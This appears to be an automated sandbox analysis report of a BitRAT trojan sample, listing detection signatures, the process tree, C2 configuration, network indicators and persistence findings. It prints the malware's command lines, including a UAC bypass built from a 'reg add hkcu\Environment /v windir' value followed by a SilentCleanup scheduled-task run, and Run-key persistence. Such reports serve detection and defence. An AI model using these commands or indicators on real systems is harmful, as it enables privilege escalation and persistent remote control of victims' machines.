Loading ...

Play interactive tourEdit tour

Windows Analysis Report Dkvunfebdprvvugtyhevcozxmecjaaclna.exe

Overview

General Information

Sample Name:Dkvunfebdprvvugtyhevcozxmecjaaclna.exe
Analysis ID:490119
MD5:0357caa3824bd63e4813a50819195fa7
SHA1:597fccaee429d0a5cd7b1c43f4ce83e9ba15a874
SHA256:7e575f55174bf857fbd7329e43985db8bbd23f657289c4abe710a6be3743b800
Tags:exe
Infos:

Most interesting Screenshot:

Detection

BitRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected BitRAT
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hides threads from debuggers
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Installs a global mouse hook
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Dkvunfebdprvvugtyhevcozxmecjaaclna.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe' MD5: 0357CAA3824BD63E4813A50819195FA7)
    • logagent.exe (PID: 5264 cmdline: logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
    • cmd.exe (PID: 4644 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3028 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 4736 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • reg.exe (PID: 388 cmdline: reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM ' MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 4728 cmdline: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5516 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6428 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Dkvunfe.exe (PID: 6896 cmdline: 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe' MD5: 0357CAA3824BD63E4813A50819195FA7)
  • Dkvunfe.exe (PID: 4420 cmdline: 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe' MD5: 0357CAA3824BD63E4813A50819195FA7)
  • cleanup

Malware Configuration

Threatname: BitRat

{"Host": "u876134.nvpn.to", "Port": "2405", "Tor Port": "0", "Install Dir": "0", "Install File": "0", "Communication Password": "b8f58c3067916bbfb50766aa8bddd42c", "Tor Process Name": "tor"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\efnuvkD.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.694193715.0000000010410000.00000040.00000001.sdmpJoeSecurity_BitRATYara detected BitRATJoe Security
    Process Memory Space: logagent.exe PID: 5264JoeSecurity_BitRATYara detected BitRATJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.2.logagent.exe.10410000.0.raw.unpackJoeSecurity_BitRATYara detected BitRATJoe Security
        17.2.logagent.exe.10410000.0.unpackJoeSecurity_BitRATYara detected BitRATJoe Security

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000011.00000002.694193715.0000000010410000.00000040.00000001.sdmpMalware Configuration Extractor: BitRat {"Host": "u876134.nvpn.to", "Port": "2405", "Tor Port": "0", "Install Dir": "0", "Install File": "0", "Communication Password": "b8f58c3067916bbfb50766aa8bddd42c", "Tor Process Name": "tor"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeVirustotal: Detection: 29%Perma Link
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeReversingLabs: Detection: 33%
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeVirustotal: Detection: 29%Perma Link
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeReversingLabs: Detection: 33%
          Machine Learning detection for sampleShow sources
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeJoe Sandbox ML: detected
          Source: logagent.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49693 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49707 version: TLS 1.2

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: u876134.nvpn.to
          Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 194.5.98.145 194.5.98.145
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: global trafficTCP traffic: 192.168.2.3:49703 -> 194.5.98.145:2405
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe, 00000000.00000003.377269532.0000000003B2C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/870016612722434110/891034373732827177/Dkvunfe
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe, 00000000.00000003.519562211.000000000083C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/870016612722434110/891034373732827177/Dkvunfebdprvvugtyhevcoz
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe, 00000000.00000003.326332059.0000000003560000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/870016612722434110/891034P
          Source: logagent.exe, logagent.exe, 00000011.00000002.694193715.0000000010410000.00000040.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_10425782 WSARecv,17_2_10425782
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49693 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49707 version: TLS 1.2
          Source: C:\Windows\SysWOW64\logagent.exeWindows user hook set: 0 mouse low level NULLJump to behavior
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: C:\Users\Public\Libraries\efnuvkD.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_03500A8C0_3_03500A8C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_104170B317_2_104170B3
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_104213B917_2_104213B9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1069C54E17_2_1069C54E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1041EA7217_2_1041EA72
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1069DCD017_2_1069DCD0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 106A09D0 appears 86 times
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 106C9C3C appears 416 times
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 10421DDD appears 171 times
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 1069A19C appears 129 times
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 105E8230 appears 85 times
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Dkvunfe.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Dkvunfe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe 7E575F55174BF857FBD7329E43985DB8BBD23F657289C4ABE710A6BE3743B800
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeVirustotal: Detection: 29%
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeFile read: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe 'C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe'
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\logagent.exe logagent.exe
          Source: unknownProcess created: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe'
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
          Source: unknownProcess created: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe'
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\logagent.exe logagent.exeJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' 'Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' 'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dkvunfebdprvvugtyhevcozxmecjaac[1]Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@25/10@23/3
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeMutant created: \Sessions\1\BaseNamedObjects\b96f41fcd9a1a5760f850e7ce8c7cb16
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_10432D5E __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,17_2_10432D5E
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: logagent.exeString found in binary or memory: set-addPolicy
          Source: logagent.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E0B78 push 004157ADh; ret 0_3_034E0BBD
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F8B00 push 0042D72Bh; ret 0_3_034F8B3B
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034FAB00 push 0042F734h; ret 0_3_034FAB44
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034EBB24 push 0042074Ah; ret 0_3_034EBB5A
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F9BA4 push 0042E7E6h; ret 0_3_034F9BF6
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E9A04 push ecx; mov dword ptr [esp], edx0_3_034E9A09
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034EC2A8 push 00420EBCh; ret 0_3_034EC2CC
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F6144 push 0042ADFCh; ret 0_3_034F620C
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_03517178 push ecx; mov dword ptr [esp], edx0_3_0351717C
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034D2124 push 00406D67h; ret 0_3_034D2177
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E01D0 push 00414E2Eh; ret 0_3_034E023E
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034FA04C push 0042EC60h; ret 0_3_034FA070
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E283C push ecx; mov dword ptr [esp], edx0_3_034E2841
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E2880 push ecx; mov dword ptr [esp], edx0_3_034E2885
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E271C push ecx; mov dword ptr [esp], edx0_3_034E2721
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034EA73C push 0041F3CFh; ret 0_3_034EA7DF
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034EC650 push 0042127Bh; ret 0_3_034EC68B
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_0350160C push 0043625Fh; ret 0_3_0350166F
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034D2EF0 push 00407B1Ah; ret 0_3_034D2F2A
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F955C push 0042E170h; ret 0_3_034F9580
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034DA584 push 0040F198h; ret 0_3_034DA5A8
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F7DB0 push 0042C9D0h; ret 0_3_034F7DE0
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034ECC00 push 0042182Bh; ret 0_3_034ECC3B
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F9C00 push 0042E820h; ret 0_3_034F9C30
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034D9C3C push 0040E9AAh; ret 0_3_034D9DBA
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034E24C0 push ecx; mov dword ptr [esp], edx0_3_034E24C5
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034F6CD0 push 0042B907h; ret 0_3_034F6D17
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_0350848C push ecx; mov dword ptr [esp], ecx0_3_03508490
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1069A4A9 push ecx; ret 17_2_1069A4BC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1069B486 push ecx; ret 17_2_1069B499
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_106C9C3C push eax; ret 17_2_106C9C5A
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: .....
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: ......
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: .....
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: ....
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: ......
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: ....
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: ......
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: ......
          Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exeStatic PE information: section name: .....
          Source: Dkvunfe.exe.0.drStatic PE information: section name: .....
          Source: Dkvunfe.exe.0.drStatic PE information: section name: ......
          Source: Dkvunfe.exe.0.drStatic PE information: section name: .....
          Source: Dkvunfe.exe.0.drStatic PE information: section name: ....
          Source: Dkvunfe.exe.0.drStatic PE information: section name: ......
          Source: Dkvunfe.exe.0.drStatic PE information: section name: ....
          Source: Dkvunfe.exe.0.drStatic PE information: section name: ......
          Source: Dkvunfe.exe.0.drStatic PE information: section name: ......
          Source: Dkvunfe.exe.0.drStatic PE information: section name: .....
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_107F2730 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,17_2_107F2730
          Source: initial sampleStatic PE information: section where entry point is pointing to: ......

          Persistence and Installation Behavior:

          barindex
          Uses cmd line tools excessively to alter registry or file dataShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeFile created: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DkvunfeJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DkvunfeJump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
